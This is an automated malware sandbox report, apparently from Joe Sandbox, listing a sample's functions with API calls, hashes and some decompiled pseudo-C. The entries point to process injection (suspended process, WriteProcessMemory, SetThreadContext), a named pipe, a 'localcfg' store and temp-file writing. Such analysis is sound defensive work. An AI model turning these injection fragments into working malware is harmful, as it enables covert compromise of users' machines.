                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E399E3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00E39A18
                                                                                • GetThreadContext.KERNEL32(?,?), ref: 00E39A52
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00E39A60
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E39A98
                                                                                • SetThreadContext.KERNEL32(?,00010002), ref: 00E39AB5
                                                                                • ResumeThread.KERNEL32(?), ref: 00E39AC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D
                                                                                • API String ID: 2981417381-2746444292
                                                                                • Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                • Instruction ID: fcdd03f8c58b34922b9dd1c7227b802150acea29ebcceb532367452251325ad9
                                                                                • Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                • Instruction Fuzzy Hash: A1212AB1E01219BBDB119BA1DC09EEF7FBCEF04754F404161FA19F1051E7B58A44CAA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E31C03 Relevance: 12.1, APIs: 8, Instructions: 106memorylibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • inet_addr.WS2_32(004102D8), ref: 00E31C18
                                                                                • LoadLibraryA.KERNEL32(004102C8), ref: 00E31C26
                                                                                • GetProcessHeap.KERNEL32 ref: 00E31C84
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 00E31C9D
                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 00E31CC1
                                                                                • HeapFree.KERNEL32(?,00000000,00000000), ref: 00E31D02
                                                                                • FreeLibrary.KERNEL32(?), ref: 00E31D0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
                                                                                • String ID:
                                                                                • API String ID: 2324436984-0
                                                                                • Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                • Instruction ID: 4ea6581a8dec1792097e3df6467446c7122d18578afb389f854346340562d7c4
                                                                                • Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                • Instruction Fuzzy Hash: 7D315832E00209BFCB119FA4DC8C8EEBEB9EB46306F6454BEE501B2110D7B54E80DB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E36CC7 Relevance: 10.6, APIs: 7, Instructions: 106fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00E36CE4
                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00E36D22
                                                                                • GetLastError.KERNEL32 ref: 00E36DA7
                                                                                • CloseHandle.KERNEL32(?), ref: 00E36DB5
                                                                                • GetLastError.KERNEL32 ref: 00E36DD6
                                                                                • DeleteFileA.KERNEL32(?), ref: 00E36DE7
                                                                                • GetLastError.KERNEL32 ref: 00E36DFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
                                                                                • String ID:
                                                                                • API String ID: 3873183294-0
                                                                                • Opcode ID: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction ID: 39ee515289d3234fa64e87a433f7840d804dc9b273e461147af512525a5fa502
                                                                                • Opcode Fuzzy Hash: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction Fuzzy Hash: 8931CE76A00249BFCB01AFB49D89AEE7FB9EB88314F54C065E251F3251D7708A94CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E36F30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\seokopfr,00E37043), ref: 00E36F4E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00E36F55
                                                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00E36F7B
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00E36F92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$\\.\pipe\seokopfr
                                                                                • API String ID: 1082366364-4284735196
                                                                                • Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                • Instruction ID: 45be5597d9c9d89c28c0f86444e6adc464bfe64488a69aa53ba4d46146b0fbcd
                                                                                • Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
                                                                                • Instruction Fuzzy Hash: FE21686174134079F3325730AC8DFFB3E8C8B12718F08A0A5F440F6092DAD988D6C2AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3AA28 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 247stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: $localcfg
                                                                                • API String ID: 1659193697-2018645984
                                                                                • Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                • Instruction ID: edfb25445282be10b9f5cd8fee03a87467fca6b6d56793bbb6f0c2c2100bd177
                                                                                • Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
                                                                                • Instruction Fuzzy Hash: 89711772A00304AADF319A58DC8EFEE7F699B0130DF2C6076F985B6091DA628DC4C757
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E8A1 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0040DD05();
				_t150 = _a4;
				_t158 = E0040DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x4136c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0040EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0040EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0040DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E004024C2( &_v20, 0, 0);
				E0040DF4C(_t146,  &_v56);
				_t158 = E0040DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

























                                                                                0x0040e8a1
                                                                                0x0040e8ac
                                                                                0x0040e8af
                                                                                0x0040e8b7
                                                                                0x0040e8c0
                                                                                0x0040e8c3
                                                                                0x0040e8c6
                                                                                0x0040e917
                                                                                0x0040e91a
                                                                                0x0040e932
                                                                                0x0040e93a
                                                                                0x0040e93a
                                                                                0x0040e943
                                                                                0x0040e947
                                                                                0x0040e94a
                                                                                0x0040e96a
                                                                                0x0040e96d
                                                                                0x0040e971
                                                                                0x0040e974
                                                                                0x0040e94c
                                                                                0x0040e94f
                                                                                0x0040e95c
                                                                                0x0040e95f
                                                                                0x0040e962
                                                                                0x0040e965
                                                                                0x0040e965
                                                                                0x0040e979
                                                                                0x0040ea3a
                                                                                0x0040ea4f
                                                                                0x0040ea59
                                                                                0x0040ea5d
                                                                                0x0040ea68
                                                                                0x0040ea6a
                                                                                0x0040ea6d
                                                                                0x0040ea6d
                                                                                0x0040e97f
                                                                                0x0040e985
                                                                                0x0040e98f
                                                                                0x0040e994
                                                                                0x0040e9a1
                                                                                0x0040e9a6
                                                                                0x0040e9b8
                                                                                0x0040e9c0
                                                                                0x0040e9c7
                                                                                0x0040e9dd
                                                                                0x0040ea02
                                                                                0x0040ea0c
                                                                                0x0040ea16
                                                                                0x0040ea19
                                                                                0x0040ea22
                                                                                0x0040ea28
                                                                                0x0040ea28
                                                                                0x0040e994
                                                                                0x0040ea77
                                                                                0x0040ea77
                                                                                0x0040ea83
                                                                                0x0040ea83
                                                                                0x0040e8d1
                                                                                0x0040e8d4
                                                                                0x0040e8d7
                                                                                0x0040e8de
                                                                                0x0040e8ea
                                                                                0x0040e8ed
                                                                                0x0040e8f5
                                                                                0x0040e8fc
                                                                                0x0040e90a
                                                                                0x0040e90c
                                                                                0x0040e911
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                  • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5
                                                                                • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                • String ID: flags_upd$localcfg
                                                                                • API String ID: 204374128-3505511081
                                                                                • Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                • Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
                                                                                • Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
                                                                                • Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3E8BB Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 96stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00E3DF6C: GetCurrentThreadId.KERNEL32 ref: 00E3DFBA
                                                                                • lstrcmp.KERNEL32(00410178,00000000), ref: 00E3E8FA
                                                                                • lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,00E36128), ref: 00E3E950
                                                                                • lstrcmp.KERNEL32(?,00000008), ref: 00E3E989
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CurrentThreadlstrcpyn
                                                                                • String ID: A$ A$ A
                                                                                • API String ID: 2920362961-1846390581
                                                                                • Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                • Instruction ID: 1bb4ebf6547023a2684384259ae47e7cdbf92d4d1be73310609372c126951094
                                                                                • Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
                                                                                • Instruction Fuzzy Hash: 2231AD31600705DBCB718F24C888BA67FE4EB89328F1199AAE556A7691D370EC80CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E36E0E Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID:
                                                                                • API String ID: 3609698214-0
                                                                                • Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                • Instruction ID: 0861db9ae087e8cb0499025305d6dd6812b36367edf559d147c65dc663d15d71
                                                                                • Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
                                                                                • Instruction Fuzzy Hash: A7215B7A204115BFDB109B72EC4DEDF3FEDDB48364F209421F502E1091EA709A04D678
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406BA7 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 43%
                                                                                			E00406BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x4130ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}









                                                                                0x00406bab
                                                                                0x00406bba
                                                                                0x00406bc4
                                                                                0x00406bc7
                                                                                0x00406bd2
                                                                                0x00406be4
                                                                                0x00406be9
                                                                                0x00406c03
                                                                                0x00406c03
                                                                                0x00406beb
                                                                                0x00406bee
                                                                                0x00406bef
                                                                                0x00406bfa
                                                                                0x00406c1a
                                                                                0x00406c23
                                                                                0x00406c28
                                                                                0x00406c3e
                                                                                0x00406c44
                                                                                0x00406c47
                                                                                0x00406c5a
                                                                                0x00406c61
                                                                                0x00406c66
                                                                                0x00406c49
                                                                                0x00406c49
                                                                                0x00406c52
                                                                                0x00000000
                                                                                0x00406c52
                                                                                0x00406c2a
                                                                                0x00406c2a
                                                                                0x00406c2b
                                                                                0x00406c30
                                                                                0x00406c30
                                                                                0x00406bfc
                                                                                0x00406bfd
                                                                                0x00000000
                                                                                0x00406c02
                                                                                0x00406bfa
                                                                                0x00406bd4
                                                                                0x00406bd4
                                                                                0x00406bd4
                                                                                0x00406c6e
                                                                                0x00406bbc
                                                                                0x00406bbf
                                                                                0x00406bbf

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID:
                                                                                • API String ID: 3609698214-0
                                                                                • Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                • Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
                                                                                • Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
                                                                                • Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E392CB Relevance: 9.1, APIs: 6, Instructions: 83filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?), ref: 00E392E2
                                                                                • wsprintfA.USER32 ref: 00E39350
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00E39375
                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 00E39389
                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 00E39394
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00E3939B
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2439722600-0
                                                                                • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                • Instruction ID: e10412743ab38f998a5e8ccb4f69156e14a9bebbe1907d4a93e3afdfe081bf43
                                                                                • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                • Instruction Fuzzy Hash: E31172B17401147BE7206731EC0EFEF3EADDBC8B10F008065BB09B5191EAB44E45C664
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409064 Relevance: 9.1, APIs: 6, Instructions: 83filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 63%
                                                                                			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}








                                                                                0x0040907b
                                                                                0x00409088
                                                                                0x0040908e
                                                                                0x00409095
                                                                                0x0040909c
                                                                                0x004090a8
                                                                                0x004090b4
                                                                                0x004090c9
                                                                                0x004090ca
                                                                                0x004090e9
                                                                                0x004090f8
                                                                                0x00409114
                                                                                0x00409118
                                                                                0x00000000
                                                                                0x0040913f
                                                                                0x0040912d
                                                                                0x00409134
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                • wsprintfA.USER32 ref: 004090E9
                                                                                • CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2439722600-0
                                                                                • Opcode ID: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                • Opcode Fuzzy Hash: f28af15f22a92dcef6476bc2819c454602b50741f9449e0ae3514995eeab5b50
                                                                                • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DD05 Relevance: 9.0, APIs: 6, Instructions: 34threadsleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				goto L7;
			}





                                                                                0x0040dd17
                                                                                0x0040dd41
                                                                                0x0040dd2c
                                                                                0x0040dd37
                                                                                0x0040dd4c
                                                                                0x0040dd39
                                                                                0x0040dd3b
                                                                                0x00000000
                                                                                0x0040dd3b
                                                                                0x0040dd37
                                                                                0x0040dd53
                                                                                0x0040dd53
                                                                                0x0040dd59
                                                                                0x0040dd62
                                                                                0x0040dd68
                                                                                0x0040dd68
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                • Sleep.KERNEL32(00000000,?,74CB43E0,?,00000000,0040E538,?,74CB43E0,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 3819781495-0
                                                                                • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3C543 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 182threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00E3C6B4
                                                                                • InterlockedIncrement.KERNEL32(00E3C74B), ref: 00E3C715
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,00E3C747), ref: 00E3C728
                                                                                • CloseHandle.KERNEL32(00000000,?,00E3C747,00413588,00E38A77), ref: 00E3C733
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 1026198776-1857712256
                                                                                • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                • Instruction ID: af389a3b46b8c1f4a550058f4d716a9ff55dd33241da05117dcc4e361e7b3b7d
